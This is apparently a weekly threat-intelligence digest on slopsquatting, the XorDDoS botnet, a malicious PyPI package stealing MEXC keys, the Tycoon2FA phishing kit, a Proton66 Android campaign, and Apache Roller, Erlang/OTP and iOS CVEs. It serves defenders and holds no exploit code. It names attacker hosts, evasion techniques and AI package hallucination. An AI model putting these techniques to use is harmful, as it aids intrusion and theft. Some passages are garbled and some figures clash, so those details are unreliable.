Malware of the Week: Slopsquatting: The Next Generation Software Supply Chain Risk

Description

With the increasing use of AI-powered code generation tools (e.g. ChatGPT-4, CodeLlama, DeepSeek), a new type of supply chain attack called “Slopsquatting” has emerged. This attack exploits the tendency of AI models to generate non-existent (fake) dependency names. Developers can unknowingly integrate malware into their systems by including these fake packages in their projects, assuming they are trustworthy.

This type of attack is a new threat targeting software supply chain security through social engineering and is widely used in open source package managers such as PyPI and npm.

Vulnerability Definition

• Vulnerability Type: Supply chain manipulation / social engineering-based dependency exploitation
• Term: Slopsquatting
• Similar to: Typosquatting
• Difference: Slopsquatting is not a typo; it is aimed at completely imaginary, AI-made-up package names.
• Domains: PyPI, npm, open-source LLMs, commercial AI code assistants (ChatGPT, GitHub Copilot, DeepSeek, etc.)

Technical Details

A study examined 576,000 code samples produced in Python and JavaScript languages ​​and found that approximately 20% of the recommended packages did not actually exist. 43% of these fake packages were repeated in similar requests, and 58% appeared at least once more. This increases the potential for attackers to target these fake package names to spread their malware.  

• Scope of Research: The study, published in March 2025, examined 576,000 code samples consisting of Python and JavaScript languages.
• Hallucination Rate:
• 20% of the suggested packages are not real
• Around 5% hallucination in ChatGPT-4
• 200,000+ fake package names detected
• Repeatability:
• 58% repeated in at least 1 out of 10 runs
• 43% repeated frequently with similar prompts
• Origin Analysis:
• 38% inspired by real packages
• 13% typos
• 51% completely fake

Impact

• Code Compromise: Developers may trust the outputs they receive from AI and include fake packages in the project.
• Supply Chain Poisoning: Fake packages containing malware (e.g. backdoor, keylogger) may integrate into systems.
• Automation Systems Risk: CI/CD, AI-powered code recommendation systems, and package managers may be affected.
• Attack Vector Breadth: Repetitive hallucinations of AI models guide attackers in target generation.

Operation Mechanism

• LLM Applications:
• Imaginary dependencies such as import fakelib, require('imaginary-dep') in code snippets
• Package Publishing Process:
• Attackers upload these fake package names to environments such as PyPI, npm as if they were real
• AI Code Suggestion Systems:
• AI re-suggests the fake package it made up in the past in new requests

Another Malware of the Week: XorDDoS Malware and New Control Infrastructure

Description

A new version of the malware called XorDDoS and its advanced command-and-control (C2) infrastructure has been revealed. This malware creates a botnet network to be used in distributed denial of service (DDoS) attacks, especially targeting Linux systems. The new control panel and central control system defined as the “VIP version” show that the attacks have become more organized and widespread.

Technical Details

• Malware: XorDDoS
• Target Systems: Linux-based servers, especially Docker servers
• Spreading Method: Root access is gained with SSH brute-force attacks and malware is installed.
• Persistence:
• Init script under /etc/init.d/
• cron job entry
• Configuration Encryption: XOR encryption (key: BB2FA36AAA9541F0)
• C2 Server Connection: Communication is established via the decrypted URL/IP list.
• Uploaded Structure: Executable file in ELF format is activated in the system with root privileges.
• Control Infrastructure: Central control server,sub-controllers and VIP version control panel
• Languages ​​Used: Simplified Chinese interface and instructions

Impact

• Botnet Network: Target systems are transformed into “zombie” bots and directed to DDoS attacks.
• High Privacy: Advanced encryption and anti-kick modules make it difficult to detect.
• Advanced Command and Control: New “central controller” infrastructure can manage multiple XorDDoS sub-controllers simultaneously.
• Global Spread: XorDDoS has targeted many countries around the world: USA, Spain, Taiwan, Canada, Japan, Brazil, Paraguay, Argentina, United Kingdom, Netherlands, Italy, Ukraine, Germany, Thailand, China, India, Israel, Venezuela, Switzerland, Singapore, Finland, Australia, Saudi Arabia, France, Turkey, UAE, South Korea.

Codes / Functions of the Vulnerability

• Xor Key Usage: BB2FA36AAA9541F0
• Controller Binder: DLL is injected to provide centralized management to sub-controllers.
• VIP Builder Features:
• 1024 package DDoS capacity
• Advanced resource management
• Network wall-penetration capability

Malicious Python Library of the Week: Malicious PyPI Package Targeting MEXC APIs

Description

In April 2025, the malicious Python package named ccxt-mexc-futures, detected on PyPI (Python Package Index), was uploaded to steal developers’ API keys on the MEXC cryptocurrency exchange. This package pretended to be an extension of the popular ccxt (CryptoCurrency eXchange Trading) library, but actually contained malicious code.

Malware Details

• Package Name: ccxt-mexc-futures
• Distribution: PyPI (now removed)
• Download Count: 1,065+
• Target: Developers trading on the MEXC crypto exchange
• Behavior:
• ccxt’s describe, sign, prepare_request_headers functions have been modified
• Fake API endpoints such as contract_private_post_order_submit, contract_private_post_order_cancel, spot4_private_post_order_place have been added

Technical Details

• The package pulls configuration from the fake domain v3.mexc.workers[.]dev
• API requests are sent to the attacker server greentreeone[.]com redirected
• MEXC API key and secret key are transmitted directly to this server
• When the user creates or cancels an order, the transaction is sent to the attacker system instead of MEXC

Impact

• API Key Compromise: Developer’s authorization information can be stolen
• Full API Control: Attacker can create and cancel orders on behalf of the user
• Financial Loss: Can cause theft of crypto assets

Phishing Campaign of the Week: Tycoon2FA Phishing Kit Targets Microsoft 365 Users

Description

Tycoon2FA is an advanced phishing kit offered as a phishing service (PhaaS) that targets Microsoft 365 and Gmail accounts. This kit is particularly notable for its ability to bypass multi-factor authentication (MFA) mechanisms.

Tycoon2FA is a Phishing-as-a-Service (PhaaS) kit that can bypass multi-factor authentication (2FA/MFA) systems. Targeting Microsoft 365 users, this malicious tool has been updated with several new techniques to evade privacy.

---

Malware Details

• Name: Tycoon2FA
• Type: Phishing Service (PhaaS)
• Targets: Microsoft 365 and Gmail users
• First Detection: October 2023
• Developer: Saad Tycoon group
• Distribution: Via private Telegram channels

---

Technical Details

Tycoon2FA uses reverse proxy servers to steal users’ credentials and session cookies. These servers forward users’ login credentials to legitimate services, allowing attackers to hijack session cookies. This way, unauthorized access is provided by bypassing MFA mechanisms.

New techniques have been added with the updates made in 2025 that make it harder to detect the kit:

1. Unicode Obfuscation

• Invisible Unicode characters are injected into JavaScript to hide the malicious payload.
• This technique is used to evade manual analysis and static signature-based security systems.
• Invisible Unicode characters are used to hide binary data within JavaScript. This makes it difficult for static analysis tools to detect malicious code.

2. CAPTCHA Evasion

• Custom CAPTCHA built with HTML5 Canvas is used instead of Cloudflare Turnstile.
• Self-hosted CAPTCHA system built using HTML5 Canvas and containing random elements allows to evade domain reputation systems.

3. Anti-Debug JavaScript

• The use of tools such as PhantomJS, Burp Suite is detected and behaviors are blocked.
• In case of suspicious detections, the user is directed to a real site (for example: rakuten.com).
• Detecting browser automation tools like PhantomJS and Burp Suite and specific action associated with analyticsJavaScript codes that block s have been added.

4. SVG File Abuse

• Malicious SVG files, which increased by 1800% between 2024-2025, are masked as voice messages and redirect the user to a phishing page.
• JavaScript in SVG is obfuscated using methods such as Base64, ROT13 and XOR.

Impact

• Users are redirected to fake Microsoft Teams/Office 365 login pages and their credentials are stolen.
• Weak points in multi-factor authentication systems are exploited.
• Chain phishing attacks can be launched by hijacking internal email chains.
• Accessing MFA-protected accounts can lead to serious consequences such as data leakage, identity theft and the compromise of corporate systems.

Attack Campaign of the Week: Proton66-Related Campaign: WordPress Sites Abused to Target Android Users

Description

According to research conducted by Trustwave SpiderLabs, attacks from IP addresses associated with the Proton66 ASN (AS198953) have compromised several WordPress sites and used them as distribution points for malware targeting Android device users. The research reveals that this campaign involves various types of malware and phishing attempts conducted via fake Google Play stores.

Detected Malware and Their Effects

• IP Used: 91.212.166.21
• Target Audience: Android users
• Redirection Mechanism: Redirection scripts obfuscated with JavaScript obfuscation
• Last Target Sites:
• us-playmarket.com
• playstors-france.com
• Detected Malware:
• XWorm: RAT targeting Korean-speaking users
• StrelaStealer: Credential stealer
• WeaXor: Ransomware

Technical Details

• JavaScript Redirection Script: getupd.js targets Android devices only.
• Bot Detection: Includes VPN, proxy, and crawler checks.
• IP Verification:
• https://api.ipify.org
• https://ipinfo.io – API Key: 3afcf479c3f3e0
• Hosting Infrastructure: Bulletproof hosting services like UNDERGROUND and BEARHOST
• Infrastructure Migration: Some IPs were redirected to different systems like Chang Way Technologies ASN

Impact

• Users: Redirected to fake stores containing malicious APK files, thus compromising their devices.
• Data Leakage: Credentials, device content, and other sensitive data are stolen.
• Web Infrastructure: Compromised WordPress sites become part of the attack chain.

Featured Vulnerability of the Week: Critical Session Management Vulnerability in Apache Roller (CVE-2025-24859)

Description

Apache Roller is a Java-based open-source blogging platform. However, a recently discovered vulnerability, coded CVE-2025-24859, causes a serious security vulnerability in the session management of this platform. This vulnerability causes existing sessions to remain valid even if users or administrators change their passwords. This allows malicious actors to maintain unauthorized access even after password changes.

Detected CVE

• CVE ID: CVE-2025-24859
• Vulnerability Type: Insufficient Session Termination (CWE-613)
• Versions Affected: Apache Roller 1.0.0 – 6.1.4
• CVSS Score: 10.0 (Critical)
• Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
• Impact: Active sessions remain valid even after password changes, increasing the risk of unauthorized access

Technical Detail

In Apache Roller versions 6.1.4 and earlier, existing sessions remain valid when user passwords are changed. This is due to the lack of centralized session management. As a result, if an attacker has obtained a user’s session information, they can access the system using that session even after the password is changed.

Impact of the Vulnerability

• Unauthorized Access: Attackers can maintain access to the system even after password changes.
• Data Leakage: The risk of critical data being compromised by unauthorized individuals increases.
• Ineffectiveness of Security Measures: Standard security measures such as password changes are rendered ineffective due to this vulnerability.

Featured Vulnerability of the Week: Critical Erlang/OTP SSH Vulnerability (CVE-2025-32433) – Code Execution Without Authentication

Description

In April 2025, a critical vulnerability (CVE-2025-32433) was discovered in the Erlang/Open Telecom Platform (OTP) SSH library. This vulnerability could allow an attacker with network access to remotely execute arbitrary code without authentication. The vulnerability was discovered by security researchers at Ruhr University Bochum and has been rated as critical with a CVSS score of 10.0.

Erlang/OTThe impact of this vulnerability is widespread, especially since P components are widely used in telecom, IoT, OT, and edge devices.

Detected CVE

• CVE ID: CVE-2025-32433
• CVSS Score: 10.0 (Critical)
• Vulnerability Type: Remote Code Execution (RCE)
• Affected Component: Erlang/OTP SSH Daemon
• Affected Versions:
• OTP-27.3.2 and earlier
• OTP-26.2.5.10 and earlier
• OTP-25.3.2.19 and earlier
• Fix Versions:
• OTP-27.3.3
• OTP-26.2.5.11
• OTP-25.3.2.20

Technical Detail

The vulnerability is due to improper processing of SSH protocol messages prior to authentication. An attacker can exploit the SSH daemon process with specially crafted connection messages that do not require authentication.

• If the SSH daemon is running with root privileges, the attacker can gain full system control.
• On affected systems, this could lead to serious consequences such as ransomware installation, data exfiltration, or service disruption.
• Session management errors in kernel modules such as ssh_connection.erl are the root cause of this vulnerability.

Impact

• Remote code execution without authentication
• Complete system takeover with root privileges
• Increased risk of system disablement (DoS) in IoT and telecom infrastructures
• Critical systems being targeted due to OTP components used in infrastructures such as Cisco and Ericsson

Featured Vulnerability of the Week: 2 Critical Vulnerabilities Actively Exploited in Apple iOS Platform (CVE-2025-31200, CVE-2025-31201)

Description

On April 17, 2025, Apple released security updates for two critical vulnerabilities currently being actively exploited for iOS, iPadOS, macOS Sequoia, tvOS, and visionOS platforms. These vulnerabilities have been used in targeted attack campaigns and can cause serious impacts on devices, such as memory corruption and bypassing security mechanisms.

CVEs Identified

1. CVE-2025-31200

• Vulnerability Type: Memory Corruption
• Component: Core Audio
• CVSS Score: 7.5
• Description: During processing of maliciously crafted media files, a memory corruption occurs in the Core Audio module, leading to arbitrary code execution.
• Solution: Improved control mechanisms for memory limits were added.
• Reported by: Google TAG and Apple

2. CVE-2025-31201

• Vulnerability Type: Pointer Authentication Bypass
• Component: RPAC
• CVSS Score: 6.8
• Description: Attackers can bypass system security checks by bypassing the pointer authentication mechanism via arbitrary memory access.
• Solution: Insecure code area removed.

Technical Details

• CVE-2025-31200: Files containing malicious audio streams can trigger heap or stack memory corruption in the Core Audio module, leading to the possibility of Remote Code Execution (RCE).
• CVE-2025-31201: The authentication mechanism (Pointer Authentication) can be bypassed via pointer manipulation in the RPAC component. This can lead to compromised system integrity and unauthorized actions.

Impact

• The vulnerabilities are actively used in advanced targeted attack campaigns.
• It may be possible to bypass iOS sandbox protections and gain kernel-level access.
• The user can be unknowingly attacked with media files.
• Personal data can be compromised, and device control can be taken over by attackers.

Codes / Functions of the Vulnerability

• audio stream handler functions in the Core Audio component
• pointer authentication wrapper functions in the RPAC component
• Apple has removed the weak code blocks in these modules and added boundary checks.